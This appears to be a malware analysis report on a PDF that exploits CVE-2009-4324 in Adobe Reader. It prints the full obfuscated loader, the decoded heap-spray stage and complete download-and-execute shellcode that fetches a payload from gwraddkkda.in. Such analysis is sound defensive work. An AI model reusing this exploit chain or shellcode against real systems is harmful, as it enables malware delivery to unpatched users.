Malicious PDF — malware analysis report

Static analysis result for SHA-256 7a81bff6bfae4667…

MALICIOUS

PDF

21.4 KB
MD5: 321967fc3e1599322bafa5b684888377 SHA-1: dd53b055e463135cae821b9a4e78eb6fb5445220 SHA-256: 7a81bff6bfae4667f116cd1664af9cc0acde020e4cb228561393500e684469fd
Risk score: 150

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution · T1059.007 Command and Scripting Interpreter: JavaScript · T1027 Obfuscated Files or Information (API names assembled from single characters; stage 2 stored as `scc`/percent double-encoded text) · T1105 Ingress Tool Transfer (the shellcode fetches a second-stage executable from the embedded URL)

The PDF carries a two-stage, heavily obfuscated JavaScript chain. Stage 1 (/JS object 8, `javascript_obj0008_000.js`) rebuilds the names `eval`, `unescape`, `app.doc`, `syncAnnotScan`, `getAnnots` and `replace` from single characters, reads the `subject` of the first annotation on page 0, turns its `scc` markers back into `%` escapes, double-`unescape`s the text and `eval`s it. The decoded stage 2 (`legacy_pdfkit_stage_000.js`) only arms itself when the EScript plug-in version is strictly between 9 and 9.3 or between 8.12 and 8.2; it then heap-sprays a 0x8000-unit NOP sled plus shellcode 1400 or 2900 times, and stage 1 triggers CVE-2009-4324 with `media.newPlayer(null)` bracketed by `util.printd` calls. The shellcode embeds the strings `urlmon.dll`, `C:\U.exe` and the second-stage URL http://gwraddkkda.in/new/post.php?e=8&& (the trailing `&&` is present in the sample), i.e. a download-and-execute of the retrieved payload. The ML classifier strongly indicates maliciousness, and the deobfuscated exploit confirms the attack vector; note that on a viewer outside the targeted version window the trigger block is skipped entirely, so a dynamic run on a patched Reader may show no activity.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009 and fixed in Reader/Acrobat 9.3 and 8.2 (APSB10-02, January 2010); this sample's own version gate (EScript >9 and <9.3, or >8.12 and <8.2) targets exactly the unpatched builds. (identified after JavaScript deobfuscation: the call is assembled at runtime as `this[vvv4][vvv3](null)` with vvv4="media", vvv3="newPlayer")
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gwraddkkda.in/new/post.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
javascript_obj0008_000.js
bf837ed9d063118125e8479246f77caa7edfd17f54200ce1dfaaeee7e8599bf1
pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 2205 bytes
Preview script
First 1,000 lines of the extracted script
// Stage-1 decoder/loader carved from /JS object 8. Analyst annotations only;
// the obfuscated text is unchanged. The /*iiosooosoos*/ comments are filler
// inserted by the obfuscator and have no effect.
//
// Returns single characters that are later glued into API names:
//   1 -> app.viewerType[1], the second character of the viewer name. The names
//        built below are only valid when this is "e" (viewerType "Reader");
//        "Exchange"/"Exchange-Pro" would yield "x" and break the chain.
//   2 -> "%"  ("%x" with the x removed)
//   3 -> "a"  ("ax" with the x removed)
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werType"][1] /*iiosooosoos*/   );
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

// Alias for the top-level `this` (the document object in Acrobat JavaScript).
var /*iiosooosoos*/SLkquXbLgJ77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

// Character table. With viewerType[1] == "e" it resolves to:
//   [0]""  [1]"e" [2]"%" [3]"a" [4]""  [5]""  [6]"o" [7]"s"
//   [8]"c" [9]"i" [10]"g" [11]"t" [12]"r" [13]"u" [14]"n" [15]"p"
var VOUDUIcVla89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

// Alias for the Acrobat `app` object.
var /*iiosooosoos*/SLkquXbLgJ77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
var wUyzGPpGXR1 = VOUDUIcVla89[1]; // "e"
var OfhfuEwkis3 = VOUDUIcVla89[2]; // "%" -- replacement text for the scc marker (see below)
var xEvMohjzoH17 = SLkquXbLgJ77[wUyzGPpGXR1+"v"+VOUDUIcVla89[3]+"l"]; // this["e"+"v"+"a"+"l"]  -> eval
var MVVjcbiiVi18 = SLkquXbLgJ77[VOUDUIcVla89[13]+VOUDUIcVla89[14]+wUyzGPpGXR1+"s"+VOUDUIcVla89[8]+VOUDUIcVla89[3]+VOUDUIcVla89[15]+wUyzGPpGXR1]; // this["u"+"n"+"e"+"s"+"c"+"a"+"p"+"e"] -> unescape


// eval('var hNWGGzFtAI15 = /scc/ig;') -- regex for the "scc" marker that the
// encoded stage uses in place of "%" (compare the scc25scc30... stream of object 7).
xEvMohjzoH17("v"+VOUDUIcVla89[3]+"r hNWGGzFtAI15 = /"+VOUDUIcVla89[7]+VOUDUIcVla89[8]+VOUDUIcVla89[8]+"/"+VOUDUIcVla89[9]+VOUDUIcVla89[10]+";");

// app["d"+"o"+"c"] -> app.doc
var RSqKNBhdMX10 = SLkquXbLgJ77z[/*iiosooosoos*/     "d"+VOUDUIcVla89[7-1]+VOUDUIcVla89[7+1]];

// app.doc.syncAnnotScan()
RSqKNBhdMX10[VOUDUIcVla89[7]+"yn"+VOUDUIcVla89[8]+"A"+VOUDUIcVla89[14]+VOUDUIcVla89[14]+"o"+VOUDUIcVla89[11]+"S"+VOUDUIcVla89[8]+VOUDUIcVla89[3]+"n"]();

// app.doc.getAnnots(0) -> annotations on page 0
var leNkeTzTaW4 = RSqKNBhdMX10[VOUDUIcVla89[10]+wUyzGPpGXR1+"tAnn"+VOUDUIcVla89[6]+VOUDUIcVla89[11]+VOUDUIcVla89[7]](0);

// annots[0].subject -- the scc-encoded stage-2 text is hidden in the annotation subject
var lchAQczWyg5 = leNkeTzTaW4[0][VOUDUIcVla89[7]+"ubj"+wUyzGPpGXR1+VOUDUIcVla89[8]+VOUDUIcVla89[11]];

// subject.replace(/scc/ig, "%") -> "%25%30%41..." percent-escapes
var sNLasFepqN6 = lchAQczWyg5/*iiosooosoos*/[VOUDUIcVla89/*iiosooosoos*/[11+1]+wUyzGPpGXR1+/*iiosooosoos*/VOUDUIcVla89[15]+"l"/*iiosooosoos*/+VOUDUIcVla89/*iiosooosoos*/[3]+VOUDUIcVla89/*iiosooosoos*/[8]+wUyzGPpGXR1]/*iiosooosoos*/(hNWGGzFtAI15,OfhfuEwkis3);

// unescape(unescape(...)) -> stage-2 source (see legacy_pdfkit_stage_000.js)
var hbsvLWPKqp7=MVVjcbiiVi18(MVVjcbiiVi18(sNLasFepqN6));
xEvMohjzoH17(hbsvLWPKqp7); // eval(stage 2): defines j, vvv, vvv2, vvv3, vvv4 and performs the heap spray

// Trigger block. `j`, `vvv`, `vvv2` ("printd"), `vvv3` ("newPlayer") and
// `vvv4` ("media") are defined by the eval'd stage 2. Stage 2 only sets `j`
// when its EScript version check passes, so on other Reader versions this
// block is skipped and nothing observable happens.
if(j){
function run(){util[vvv2](vvv, new Date());} // util.printd(vvv, new Date())
run();run();
try {this[vvv4][vvv3](null);} catch(e) {} // this.media.newPlayer(null) -- CVE-2009-4324 use-after-free
run();
}
javascript_obj0008_001.js
9de362ec79011792c5f406718c84fbf2aea19c33a99f344efd8745440d406fe6
pdf-javascript-stream PDF /JS object 8 at offset 0x209 21353 bytes — overlapping carve: its script text is identical to javascript_obj0008_000.js, but the 21,353-byte extent runs past the stream's `endstream` into object 7 (`/Length 18840`), whose `scc`-encoded stream is what follows the script below.
Detection
ClamAV: No threats found — a signature miss on the carved, obfuscated fragment; this does not offset the deobfuscation-based findings above and should not be read as a benign signal.
Obfuscation or payload: likely
Carved artifact contains 1 long encoded blob. It is not base64: it is the `scc`-delimited hex stream of object 7 (`scc25scc30scc41…`), which stage 1 decodes by replacing `scc` with `%` and double-`unescape`-ing (`%25%30%41` → `%0A` → newline, `%25%37%36` → `v`, …); the result is the stage-2 script shown as legacy_pdfkit_stage_000.js.
Preview script
First 1,000 lines of the extracted script
// Duplicate carve of the same /JS object 8 stream (this artifact starts 34 bytes
// after javascript_obj0008_000.js and overruns into object 7). The script text
// is byte-identical to that artifact; only the key name resolutions are noted here.
// Helper yielding characters: 1 -> app.viewerType[1] ("e" on Reader), 2 -> "%", 3 -> "a".
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werType"][1] /*iiosooosoos*/   );
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

var /*iiosooosoos*/SLkquXbLgJ77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

// Character table: ["", "e", "%", "a", "", "", "o","s","c","i","g","t","r","u","n","p"]
var VOUDUIcVla89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

var /*iiosooosoos*/SLkquXbLgJ77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
var wUyzGPpGXR1 = VOUDUIcVla89[1];
var OfhfuEwkis3 = VOUDUIcVla89[2];
var xEvMohjzoH17 = SLkquXbLgJ77[wUyzGPpGXR1+"v"+VOUDUIcVla89[3]+"l"]; // -> eval
var MVVjcbiiVi18 = SLkquXbLgJ77[VOUDUIcVla89[13]+VOUDUIcVla89[14]+wUyzGPpGXR1+"s"+VOUDUIcVla89[8]+VOUDUIcVla89[3]+VOUDUIcVla89[15]+wUyzGPpGXR1]; // -> unescape


// eval('var hNWGGzFtAI15 = /scc/ig;')
xEvMohjzoH17("v"+VOUDUIcVla89[3]+"r hNWGGzFtAI15 = /"+VOUDUIcVla89[7]+VOUDUIcVla89[8]+VOUDUIcVla89[8]+"/"+VOUDUIcVla89[9]+VOUDUIcVla89[10]+";");

var RSqKNBhdMX10 = SLkquXbLgJ77z[/*iiosooosoos*/     "d"+VOUDUIcVla89[7-1]+VOUDUIcVla89[7+1]]; // app.doc

RSqKNBhdMX10[VOUDUIcVla89[7]+"yn"+VOUDUIcVla89[8]+"A"+VOUDUIcVla89[14]+VOUDUIcVla89[14]+"o"+VOUDUIcVla89[11]+"S"+VOUDUIcVla89[8]+VOUDUIcVla89[3]+"n"](); // syncAnnotScan()

var leNkeTzTaW4 = RSqKNBhdMX10[VOUDUIcVla89[10]+wUyzGPpGXR1+"tAnn"+VOUDUIcVla89[6]+VOUDUIcVla89[11]+VOUDUIcVla89[7]](0); // getAnnots(0)

var lchAQczWyg5 = leNkeTzTaW4[0][VOUDUIcVla89[7]+"ubj"+wUyzGPpGXR1+VOUDUIcVla89[8]+VOUDUIcVla89[11]]; // annots[0].subject

// subject.replace(/scc/ig, "%")
var sNLasFepqN6 = lchAQczWyg5/*iiosooosoos*/[VOUDUIcVla89/*iiosooosoos*/[11+1]+wUyzGPpGXR1+/*iiosooosoos*/VOUDUIcVla89[15]+"l"/*iiosooosoos*/+VOUDUIcVla89/*iiosooosoos*/[3]+VOUDUIcVla89/*iiosooosoos*/[8]+wUyzGPpGXR1]/*iiosooosoos*/(hNWGGzFtAI15,OfhfuEwkis3);

var hbsvLWPKqp7=MVVjcbiiVi18(MVVjcbiiVi18(sNLasFepqN6)); // unescape(unescape(...)) -> stage 2
xEvMohjzoH17(hbsvLWPKqp7); // eval(stage 2)

// Trigger: names come from stage 2; `j` is only set inside the targeted version window.
if(j){
function run(){util[vvv2](vvv, new Date());} // util.printd(...)
run();run();
try {this[vvv4][vvv3](null);} catch(e) {} // media.newPlayer(null) -- CVE-2009-4324
run();
}
endstream
endobj
7 0 obj
<<
/Length 18840
>>
stream
scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc36scc31scc25scc37scc30scc25scc37scc30scc25scc32scc45scc25scc37scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc34scc39scc25scc36scc45scc25scc37scc33scc25scc33scc42scc25scc30scc41scc25scc36scc36scc25scc36scc46scc25scc37scc32scc25scc32scc30scc25scc32scc38scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc39scc25scc33scc44scc25scc33scc30scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc30scc25scc33scc43scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc42scc25scc32scc42scc25scc32scc39scc25scc37scc42scc25scc30scc41scc25scc36scc39scc25scc36scc36scc25scc32scc30scc25scc32scc38scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc36scc45scc25scc36scc31scc25scc36scc44scc25scc36scc35scc25scc33scc44scc25scc33scc44scc25scc32scc32scc25scc34scc35scc25scc35scc33scc25scc36scc33scc25scc37scc32scc25scc36scc39scc25scc37scc30scc25scc37scc34scc25scc32scc32scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc43scc25scc37scc36scc25scc33scc44scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc37
... (truncated)
legacy_pdfkit_stage_000.js
c3df0b6d669953258363ab802ac0d32c63d5685d76eb2e0ad1f70f86b924f691
deobfuscated-js repeated-marker hex decoded JavaScript at offset 0xAB8 1256 bytes
Detection
ClamAV: No threats found — signature miss on a deobfuscated, sample-specific fragment; the version gate, heap spray and embedded download-and-execute shellcode below are the evidence, not the AV verdict.
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Stage 2 -- decoded from the scc/percent-encoded annotation text and eval'd by
// stage 1. It prepares the heap spray and the names stage 1's trigger block
// uses; it does not itself call media.newPlayer.

// Find the EScript (JavaScript engine) plug-in and read its version.
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
// Version gate: spray size `j` is only set for 9 < lv < 9.3 or 8.12 < lv < 8.2
// (the builds left unpatched for CVE-2009-4324). Otherwise `j` stays undefined
// and stage 1's `if(j)` skips the trigger entirely.
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
// Shellcode as little-endian %uXXXX escapes. Decoding the tail yields the
// strings "urlmon.dll", "C:\U.exe" and "http://gwraddkkda.in/new/post.php?e=8&&",
// i.e. a download-to-file-and-execute stub. The 32-bit constants loaded before
// each call (0xEC0E4E8E, 0x702F1A36, 0x0E8AFE98, 0x73E2D87E) match the classic
// ROR-13 hashes of LoadLibraryA, URLDownloadToFileA, WinExec and ExitProcess --
// NOTE(review): hash attribution inferred from known tables; confirm in an emulator.
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u7277%u6461%u6B64%u646B%u2E61%u6E69%u6E2F%u7765%u702F%u736F%u2E74%u6870%u3F70%u3D65%u2638%u0026";
// NOP sled seed (0x90 bytes).
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
// Grow the sled to 0x8000 UTF-16 units, then trim so sled + shellcode is exactly
// 0x8000 units (64 KiB) per block.
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
// Heap spray: `j` copies of sled+shellcode kept alive in the global array `s`.
for(i=0;i<j;i++) {s[i]=str + sh;}
// Values consumed by stage 1's trigger block: util.printd(vvv, new Date()) is
// called twice before and once after this.media.newPlayer(null). The long
// format string is presumably heap grooming around the use-after-free, as in
// the public CVE-2009-4324 exploit -- NOTE(review): inferred, not proven here.
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd"; // util[vvv2]
var vvv3 = "newPlayer"; // media[vvv3]
var vvv4 = "media"; // this[vvv4]
legacy_pdfkit_stage_001.js
42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414
deobfuscated-js cross-stage annotation API aliases at offset 0x1E7 81 bytes
Preview script
First 1,000 lines of the extracted script
// Resolved form of stage 1's `this[vvv4][vvv3](null)` with vvv4="media" and
// vvv3="newPlayer" taken from the decoded stage 2: the CVE-2009-4324 trigger.
media.newPlayer(null); /* alias values recovered from decoded annotation stage */